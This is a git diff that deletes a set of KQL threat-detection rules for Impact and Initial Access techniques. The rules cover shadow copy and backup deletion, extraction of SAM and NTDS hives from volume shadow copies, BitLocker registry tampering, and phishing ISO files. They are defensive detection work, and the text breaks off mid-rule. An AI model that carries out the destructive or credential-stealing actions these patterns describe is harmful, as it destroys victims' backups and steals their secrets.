a/Impact/Potentially_Suspicious_Desktop_Background_Change_Using_Reg.EXE.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Stephen Lincoln @slincoln-aiq (AttackIQ) -// Date: 2023/12/21 -// Level: medium -// Description: Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background. -This is a common technique used by malware to change the desktop background to a ransom note or other image. - -// Tags: attack.defense_evasion, attack.impact, attack.t1112, attack.t1491.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "add" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) and (ProcessCommandLine contains "Control Panel\\Desktop" or ProcessCommandLine contains "CurrentVersion\\Policies\\ActiveDesktop" or ProcessCommandLine contains "CurrentVersion\\Policies\\System") and ((ProcessCommandLine contains "/v NoChangingWallpaper" and ProcessCommandLine contains "/d 1") or (ProcessCommandLine contains "/v Wallpaper" and ProcessCommandLine contains "/t REG_SZ") or (ProcessCommandLine contains "/v WallpaperStyle" and ProcessCommandLine contains "/d 2")) \ No newline at end of file diff --git a/Impact/Potentially_Suspicious_Desktop_Background_Change_Via_Registry.kql b/Impact/Potentially_Suspicious_Desktop_Background_Change_Via_Registry.kql deleted file mode 100644 index ea293a77..00000000 --- a/Impact/Potentially_Suspicious_Desktop_Background_Change_Via_Registry.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Stephen Lincoln @slincoln-aiq (AttackIQ) -// Date: 2023/12/21 -// Level: medium -// Description: Detects regsitry value settings that would replace the user's desktop background. -This is a common technique used by malware to change the desktop background to a ransom note or other image. - -// Tags: attack.defense_evasion, attack.impact, attack.t1112, attack.t1491.001 -DeviceRegistryEvents -| where (RegistryKey contains "Control Panel\\Desktop" or RegistryKey contains "CurrentVersion\\Policies\\ActiveDesktop" or RegistryKey contains "CurrentVersion\\Policies\\System") and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "NoChangingWallpaper") or RegistryKey endswith "\\Wallpaper" or (RegistryValueData =~ "2" and RegistryKey endswith "\\WallpaperStyle")) and (not(InitiatingProcessFolderPath endswith "\\svchost.exe")) \ No newline at end of file diff --git a/Impact/Registry_Disable_System_Restore.kql b/Impact/Registry_Disable_System_Restore.kql deleted file mode 100644 index 987d2564..00000000 --- a/Impact/Registry_Disable_System_Restore.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/04/04 -// Level: high -// Description: Detects the modification of the registry to disable a system restore on the computer -// Tags: attack.impact, attack.t1490 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey contains "\\Policies\\Microsoft\\Windows NT\\SystemRestore" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore") and (RegistryKey endswith "DisableConfig" or RegistryKey endswith "DisableSR") \ No newline at end of file diff --git a/Impact/Renamed_Gpg.EXE_Execution.kql b/Impact/Renamed_Gpg.EXE_Execution.kql deleted file mode 100644 index 8b2e50af..00000000 --- a/Impact/Renamed_Gpg.EXE_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), frack113 -// Date: 2023/08/09 -// Level: high -// Description: Detects the execution of a renamed "gpg.exe". Often used by ransomware and loaders to decrypt/encrypt data. -// Tags: attack.impact, attack.t1486 -DeviceProcessEvents -| where ProcessVersionInfoOriginalFileName =~ "gpg.exe" and (not((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe"))) \ No newline at end of file diff --git a/Impact/Renamed_Sysinternals_Sdelete_Execution.kql b/Impact/Renamed_Sysinternals_Sdelete_Execution.kql deleted file mode 100644 index 85f47581..00000000 --- a/Impact/Renamed_Sysinternals_Sdelete_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/09/06 -// Level: high -// Description: Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming) -// Tags: attack.impact, attack.t1485 -DeviceProcessEvents -| where ProcessVersionInfoOriginalFileName =~ "sdelete.exe" and (not((FolderPath endswith "\\sdelete.exe" or FolderPath endswith "\\sdelete64.exe"))) \ No newline at end of file diff --git a/Impact/Sensitive_File_Access_Via_Volume_Shadow_Copy_Backup.kql b/Impact/Sensitive_File_Access_Via_Volume_Shadow_Copy_Backup.kql deleted file mode 100644 index 61901361..00000000 --- a/Impact/Sensitive_File_Access_Via_Volume_Shadow_Copy_Backup.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems) -// Date: 2021/08/09 -// Level: high -// Description: Detects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit) - -// Tags: attack.impact, attack.t1490 -DeviceProcessEvents -| where ProcessCommandLine contains "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy" and (ProcessCommandLine contains "\\NTDS.dit" or ProcessCommandLine contains "\\SYSTEM" or ProcessCommandLine contains "\\SECURITY") \ No newline at end of file diff --git a/Impact/Shadow_Copies_Deletion_Using_Operating_Systems_Utilities.kql b/Impact/Shadow_Copies_Deletion_Using_Operating_Systems_Utilities.kql deleted file mode 100644 index ef8ae60e..00000000 --- a/Impact/Shadow_Copies_Deletion_Using_Operating_Systems_Utilities.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades) -// Date: 2019/10/22 -// Level: high -// Description: Shadow Copies deletion using operating systems utilities -// Tags: attack.defense_evasion, attack.impact, attack.t1070, attack.t1490 -DeviceProcessEvents -| where ((ProcessCommandLine contains "shadow" and ProcessCommandLine contains "delete") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\diskshadow.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll", "wmic.exe", "VSSADMIN.EXE", "diskshadow.exe")))) or ((ProcessCommandLine contains "delete" and ProcessCommandLine contains "catalog" and ProcessCommandLine contains "quiet") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")) or (((ProcessCommandLine contains "unbounded" or ProcessCommandLine contains "/MaxSize=") and (ProcessCommandLine contains "resize" and ProcessCommandLine contains "shadowstorage")) and (FolderPath endswith "\\vssadmin.exe" or ProcessVersionInfoOriginalFileName =~ "VSSADMIN.EXE")) \ No newline at end of file diff --git a/Impact/Stop_Windows_Service_Via_Net.EXE.kql b/Impact/Stop_Windows_Service_Via_Net.EXE.kql deleted file mode 100644 index b06abb2a..00000000 --- a/Impact/Stop_Windows_Service_Via_Net.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/03/05 -// Level: low -// Description: Detects the stopping of a Windows service via the "net" utility. -// Tags: attack.impact, attack.t1489 -DeviceProcessEvents -| where ProcessCommandLine contains " stop " and ((ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) \ No newline at end of file diff --git a/Impact/Stop_Windows_Service_Via_PowerShell_Stop-Service.kql b/Impact/Stop_Windows_Service_Via_PowerShell_Stop-Service.kql deleted file mode 100644 index d8555ff2..00000000 --- a/Impact/Stop_Windows_Service_Via_PowerShell_Stop-Service.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/03/05 -// Level: low -// Description: Detects the stopping of a Windows service via the PowerShell Cmdlet "Stop-Service" -// Tags: attack.impact, attack.t1489 -DeviceProcessEvents -| where ProcessCommandLine contains "Stop-Service " and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) \ No newline at end of file diff --git a/Impact/Stop_Windows_Service_Via_Sc.EXE.kql b/Impact/Stop_Windows_Service_Via_Sc.EXE.kql deleted file mode 100644 index c9c45332..00000000 --- a/Impact/Stop_Windows_Service_Via_Sc.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/03/05 -// Level: low -// Description: Detects the stopping of a Windows service via the "sc.exe" utility -// Tags: attack.impact, attack.t1489 -DeviceProcessEvents -| where ProcessCommandLine contains " stop " and (ProcessVersionInfoOriginalFileName =~ "sc.exe" or FolderPath endswith "\\sc.exe") \ No newline at end of file diff --git a/Impact/Suspicious_Creation_TXT_File_in_User_Desktop.kql b/Impact/Suspicious_Creation_TXT_File_in_User_Desktop.kql deleted file mode 100644 index 14243c8b..00000000 --- a/Impact/Suspicious_Creation_TXT_File_in_User_Desktop.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/12/26 -// Level: high -// Description: Ransomware create txt file in the user Desktop -// Tags: attack.impact, attack.t1486 -DeviceFileEvents -| where InitiatingProcessFolderPath endswith "\\cmd.exe" and (FolderPath contains "\\Users\\" and FolderPath contains "\\Desktop\\") and FolderPath endswith ".txt" \ No newline at end of file diff --git a/Impact/Suspicious_Execution_of_Shutdown.kql b/Impact/Suspicious_Execution_of_Shutdown.kql deleted file mode 100644 index 1b1bcf08..00000000 --- a/Impact/Suspicious_Execution_of_Shutdown.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/01/01 -// Level: medium -// Description: Use of the commandline to shutdown or reboot windows -// Tags: attack.impact, attack.t1529 -DeviceProcessEvents -| where (ProcessCommandLine contains "/r " or ProcessCommandLine contains "/s ") and FolderPath endswith "\\shutdown.exe" \ No newline at end of file diff --git a/Impact/Suspicious_Execution_of_Shutdown_to_Log_Out.kql b/Impact/Suspicious_Execution_of_Shutdown_to_Log_Out.kql deleted file mode 100644 index 7c380a20..00000000 --- a/Impact/Suspicious_Execution_of_Shutdown_to_Log_Out.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/10/01 -// Level: medium -// Description: Detects the rare use of the command line tool shutdown to logoff a user -// Tags: attack.impact, attack.t1529 -DeviceProcessEvents -| where ProcessCommandLine contains "/l" and FolderPath endswith "\\shutdown.exe" \ No newline at end of file diff --git a/Impact/Suspicious_Reg_Add_BitLocker.kql b/Impact/Suspicious_Reg_Add_BitLocker.kql deleted file mode 100644 index 9acc3570..00000000 --- a/Impact/Suspicious_Reg_Add_BitLocker.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/11/15 -// Level: high -// Description: Detects suspicious addition to BitLocker related registry keys via the reg.exe utility -// Tags: attack.impact, attack.t1486 -DeviceProcessEvents -| where (ProcessCommandLine contains "EnableBDEWithNoTPM" or ProcessCommandLine contains "UseAdvancedStartup" or ProcessCommandLine contains "UseTPM" or ProcessCommandLine contains "UseTPMKey" or ProcessCommandLine contains "UseTPMKeyPIN" or ProcessCommandLine contains "RecoveryKeyMessageSource" or ProcessCommandLine contains "UseTPMPIN" or ProcessCommandLine contains "RecoveryKeyMessage") and (ProcessCommandLine contains "REG" and ProcessCommandLine contains "ADD" and ProcessCommandLine contains "\\SOFTWARE\\Policies\\Microsoft\\FVE" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "/f") \ No newline at end of file diff --git a/Impact/Suspicious_Volume_Shadow_Copy_VSS_PS.dll_Load.kql b/Impact/Suspicious_Volume_Shadow_Copy_VSS_PS.dll_Load.kql deleted file mode 100644 index 714a3039..00000000 --- a/Impact/Suspicious_Volume_Shadow_Copy_VSS_PS.dll_Load.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Markus Neis, @markus_neis -// Date: 2021/07/07 -// Level: high -// Description: Detects the image load of vss_ps.dll by uncommon executables -// Tags: attack.defense_evasion, attack.impact, attack.t1490 -DeviceImageLoadEvents -| where FolderPath endswith "\\vss_ps.dll" and (not((isnull(InitiatingProcessFolderPath) or ((InitiatingProcessFolderPath endswith "\\clussvc.exe" or InitiatingProcessFolderPath endswith "\\dismhost.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe" or InitiatingProcessFolderPath endswith "\\inetsrv\\appcmd.exe" or InitiatingProcessFolderPath endswith "\\inetsrv\\iissetup.exe" or InitiatingProcessFolderPath endswith "\\msiexec.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\searchindexer.exe" or InitiatingProcessFolderPath endswith "\\srtasks.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\System32\\SystemPropertiesAdvanced.exe" or InitiatingProcessFolderPath endswith "\\taskhostw.exe" or InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\tiworker.exe" or InitiatingProcessFolderPath endswith "\\vssvc.exe" or InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe" or InitiatingProcessFolderPath endswith "\\wsmprovhost.exe") and InitiatingProcessFolderPath startswith "C:\\Windows\\") or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or (InitiatingProcessCommandLine contains "\\dismhost.exe {" and InitiatingProcessCommandLine startswith "C:\\$WinREAgent\\Scratch\\")))) \ No newline at end of file diff --git a/Impact/Suspicious_Volume_Shadow_Copy_Vssapi.dll_Load.kql b/Impact/Suspicious_Volume_Shadow_Copy_Vssapi.dll_Load.kql deleted file mode 100644 index 76697076..00000000 --- a/Impact/Suspicious_Volume_Shadow_Copy_Vssapi.dll_Load.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/10/31 -// Level: high -// Description: Detects the image load of VSS DLL by uncommon executables -// Tags: attack.defense_evasion, attack.impact, attack.t1490 -DeviceImageLoadEvents -| where FolderPath endswith "\\vssapi.dll" and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache\\" or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\{" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\"))))) \ No newline at end of file diff --git a/Impact/Suspicious_Volume_Shadow_Copy_Vsstrace.dll_Load.kql b/Impact/Suspicious_Volume_Shadow_Copy_Vsstrace.dll_Load.kql deleted file mode 100644 index ddc53c62..00000000 --- a/Impact/Suspicious_Volume_Shadow_Copy_Vsstrace.dll_Load.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2023/02/17 -// Level: high -// Description: Detects the image load of VSS DLL by uncommon executables -// Tags: attack.defense_evasion, attack.impact, attack.t1490 -DeviceImageLoadEvents -| where FolderPath endswith "\\vsstrace.dll" and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\{" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\"))))) \ No newline at end of file diff --git a/Impact/Windows_Backup_Deleted_Via_Wbadmin.EXE.kql b/Impact/Windows_Backup_Deleted_Via_Wbadmin.EXE.kql deleted file mode 100644 index 6e4d7eae..00000000 --- a/Impact/Windows_Backup_Deleted_Via_Wbadmin.EXE.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2021/12/13 -// Level: medium -// Description: Detects the deletion of backups or system state backups via "wbadmin.exe". -This technique is used by numerous ransomware families and actors. -This may only be successful on server platforms that have Windows Backup enabled. - -// Tags: attack.impact, attack.t1490 -DeviceProcessEvents -| where ((ProcessCommandLine contains "delete " and ProcessCommandLine contains "backup") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")) and (not(ProcessCommandLine contains "keepVersions:0")) \ No newline at end of file diff --git a/Initial Access/Arbitrary_Shell_Command_Execution_Via_Settingcontent-Ms.kql b/Initial Access/Arbitrary_Shell_Command_Execution_Via_Settingcontent-Ms.kql deleted file mode 100644 index c2a5c681..00000000 --- a/Initial Access/Arbitrary_Shell_Command_Execution_Via_Settingcontent-Ms.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Sreeman -// Date: 2020/03/13 -// Level: medium -// Description: The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries. -// Tags: attack.t1204, attack.t1566.001, attack.execution, attack.initial_access -DeviceProcessEvents -| where ProcessCommandLine contains ".SettingContent-ms" and (not(ProcessCommandLine contains "immersivecontrolpanel")) \ No newline at end of file diff --git a/Initial Access/HTML_Help_HH.EXE_Suspicious_Child_Process.kql b/Initial Access/HTML_Help_HH.EXE_Suspicious_Child_Process.kql deleted file mode 100644 index 25771e32..00000000 --- a/Initial Access/HTML_Help_HH.EXE_Suspicious_Child_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems) -// Date: 2020/04/01 -// Level: high -// Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe) -// Tags: attack.defense_evasion, attack.execution, attack.initial_access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001 -DeviceProcessEvents -| where (FolderPath endswith "\\CertReq.exe" or FolderPath endswith "\\CertUtil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\MSbuild.exe" or FolderPath endswith "\\MSHTA.EXE" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\hh.exe" \ No newline at end of file diff --git a/Initial Access/ISO_File_Created_Within_Temp_Folders.kql b/Initial Access/ISO_File_Created_Within_Temp_Folders.kql deleted file mode 100644 index faa3924b..00000000 --- a/Initial Access/ISO_File_Created_Within_Temp_Folders.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: @sam0x90 -// Date: 2022/07/30 -// Level: high -// Description: Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022. -// Tags: attack.initial_access, attack.t1566.001 -DeviceFileEvents -| where ((FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath contains ".zip\\") and FolderPath endswith ".iso") or (FolderPath contains "\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Outlook\\" and FolderPath endswith ".iso") \ No newline at end of file diff --git a/Initial Access/ISO_or_Image_Mount_Indicator_in_Recent_Files.kql b/Initial Access/ISO_or_Image_Mount_Indicator_in_Recent_Files.kql deleted file mode 100644 index ca6ce719..00000000 --- a/Initial Access/ISO_or_Image_Mount_Indicator_in_Recent_Files.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/02/11 -// Level: medium -// Description: Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks. -This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files. - -// Tags: attack.initial_access, attack.t1566.001 -DeviceFileEvents -| where FolderPath contains "\\Microsoft\\Windows\\Recent\\" and (FolderPath endswith ".iso.lnk" or FolderPath endswith ".img.lnk" or FolderPath endswith ".vhd.lnk" or FolderPath endswith ".vhdx.lnk") \ No newline at end of file diff --git a/Initial Access/Office_Macro_File_Creation.kql b/Initial Access/Office_Macro_File_Creation.kql deleted file mode 100644 index befbebcf..00000000 --- a/Initial Access/Office_Macro_File_Creation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/01/23 -// Level: low -// Description: Detects the creation of a new office macro files on the systems -// Tags: attack.initial_access, attack.t1566.001 -DeviceFileEvents -| where FolderPath endswith ".docm" or FolderPath endswith ".dotm" or FolderPath endswith ".xlsm" or FolderPath endswith ".xltm" or FolderPath endswith ".potm" or FolderPath endswith ".pptm" \ No newline at end of file diff --git a/Initial Access/Office_Macro_File_Creation_From_Suspicious_Process.kql b/Initial Access/Office_Macro_File_Creation_From_Suspicious_Process.kql deleted file mode 100644 index e74caaca..00000000 --- a/Initial Access/Office_Macro_File_Creation_From_Suspicious_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/01/23 -// Level: high -// Description: Detects the creation of a office macro file from a a suspicious process -// Tags: attack.initial_access, attack.t1566.001 -DeviceFileEvents -| where ((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or (InitiatingProcessParentFileName in~ ("cscript.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe", "wscript.exe"))) and (FolderPath endswith ".docm" or FolderPath endswith ".dotm" or FolderPath endswith ".xlsm" or FolderPath endswith ".xltm" or FolderPath endswith ".potm" or FolderPath endswith ".pptm") \ No newline at end of file diff --git a/Initial Access/Office_Macro_File_Download.kql b/Initial Access/Office_Macro_File_Download.kql deleted file mode 100644 index e589acbc..00000000 --- a/Initial Access/Office_Macro_File_Download.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/01/23 -// Level: medium -// Description: Detects the creation of a new office macro files on the systems via an application (browser, mail client). -// Tags: attack.initial_access, attack.t1566.001 -DeviceFileEvents -| where ((FolderPath endswith ".docm" or FolderPath endswith ".dotm" or FolderPath endswith ".xlsm" or FolderPath endswith ".xltm" or FolderPath endswith ".potm" or FolderPath endswith ".pptm") or (FolderPath contains ".docm:Zone" or FolderPath contains ".dotm:Zone" or FolderPath contains ".xlsm:Zone" or FolderPath contains ".xltm:Zone" or FolderPath contains ".potm:Zone" or FolderPath contains ".pptm:Zone")) and (InitiatingProcessFolderPath endswith "\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\thunderbird.exe" or InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\MicrosoftEdge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe") \ No newline at end of file diff --git a/Initial Access/Password_Provided_In_Command_Line_Of_Net.EXE.kql b/Initial Access/Password_Provided_In_Command_Line_Of_Net.EXE.kql deleted file mode 100644 index 5662813f..00000000 --- a/Initial Access/Password_Provided_In_Command_Line_Of_Net.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Tim Shelton (HAWK.IO) -// Date: 2021/12/09 -// Level: medium -// Description: Detects a when net.exe is called with a password in the command line -// Tags: attack.defense_evasion, attack.initial_access, attack.persistence, attack.privilege_escalation, attack.lateral_movement, attack.t1021.002, attack.t1078 -DeviceProcessEvents -| where ((ProcessCommandLine contains " use " and (ProcessCommandLine contains ":" and ProcessCommandLine contains "\\") and (ProcessCommandLine contains "/USER:" and ProcessCommandLine contains " ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine endswith " ")) \ No newline at end of file diff --git a/Initial Access/Phishing_Pattern_ISO_in_Archive.kql b/Initial Access/Phishing_Pattern_ISO_in_Archive.kql deleted file mode 100644 index 12c62ad9..00000000 --- a/Initial Access/Phishing_Pattern_ISO_in_Archive.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/06/07 -// Level: high -// Description: Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web) -// Tags: attack.initial_access, attack.t1566 -DeviceProcessEvents -| where (FolderPath endswith "\\isoburn.exe" or FolderPath endswith "\\PowerISO.exe" or FolderPath endswith "\\ImgBurn.exe") and (InitiatingProcessFolderPath endswith "\\Winrar.exe" or InitiatingProcessFolderPath endswith "\\7zFM.exe" or InitiatingProcessFolderPath endswith "\\peazip.exe") \ No newline at end of file diff --git a/Initial Access/Potential_Initial_Access_via_DLL_Search_Order_Hijacking.kql b/Initial Access/Potential_Initial_Access_via_DLL_Search_Order_Hijacking.kql deleted file mode 100644 index 3c74a001..00000000 --- a/Initial Access/Potential_Initial_Access_via_DLL_Search_Order_Hijacking.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Tim Rauch (rule), Elastic (idea) -// Date: 2022/10/21 -// Level: medium -// Description: Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking. -// Tags: attack.t1566, attack.t1566.001, attack.initial_access, attack.t1574, attack.t1574.001, attack.defense_evasion -DeviceFileEvents -| where ((InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\MSPUB.EXE" or InitiatingProcessFolderPath endswith "\\fltldr.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (FolderPath contains "\\Microsoft\\OneDrive\\" or FolderPath contains "\\Microsoft OneDrive\\" or FolderPath contains "\\Microsoft\\Teams\\" or FolderPath contains "\\Local\\slack\\app-" or FolderPath contains "\\Local\\Programs\\Microsoft VS Code\\") and (FolderPath contains "\\Users\\" and FolderPath contains "\\AppData\\") and FolderPath endswith ".dll") and (not((InitiatingProcessFolderPath endswith "\\cmd.exe" and (FolderPath contains "\\Users\\" and FolderPath contains "\\AppData\\" and FolderPath contains "\\Microsoft\\OneDrive\\" and FolderPath contains "\\api-ms-win-core-")))) \ No newline at end of file diff --git a/Initial Access/Remote_Access_Tool_-_AnyDesk_Execution_With_Known_Revoked_Signing_Certificate.kql b/Initial Access/Remote_Access_Tool_-_AnyDesk_Execution_With_Known_Revoked_Signing_Certificate.kql deleted file mode 100644 index 23d22f38..00000000 --- a/Initial Access/Remote_Access_Tool_-_AnyDesk_Execution_With_Known_Revoked_Signing_Certificate.kql +++ /dev/null @@ -1,11 +0,0 @@ -// Author: Sai Prashanth Pulisetti, Nasreddine Bencherchali (Nextron Systems) -// Date: 2024/02/08 -// Level: medium -// Description: Detects the execution of an AnyDesk binary with a version prior to 8.0.8. -Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors. -Use this rule to detect instances of older versions of Anydesk using the compromised certificate -This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections. - -// Tags: attack.execution, attack.initial_access -DeviceProcessEvents -| where ((FolderPath endswith "\\AnyDesk.exe" or ProcessVersionInfoFileDescription =~ "AnyDesk" or ProcessVersionInfoProductName =~ "AnyDesk" or ProcessVersionInfoCompanyName =~ "AnyDesk Software GmbH") and (ProcessVersionInfoProductVersion startswith "7.0." or ProcessVersionInfoProductVersion startswith "7.1." or ProcessVersionInfoProductVersion startswith "8.0.1" or ProcessVersionInfoProductVersion startswith "8.0.2" or ProcessVersionInfoProductVersion startswith "8.0.3" or ProcessVersionInfoProductVersion startswith "8.0.4" or ProcessVersionInfoProductVersion 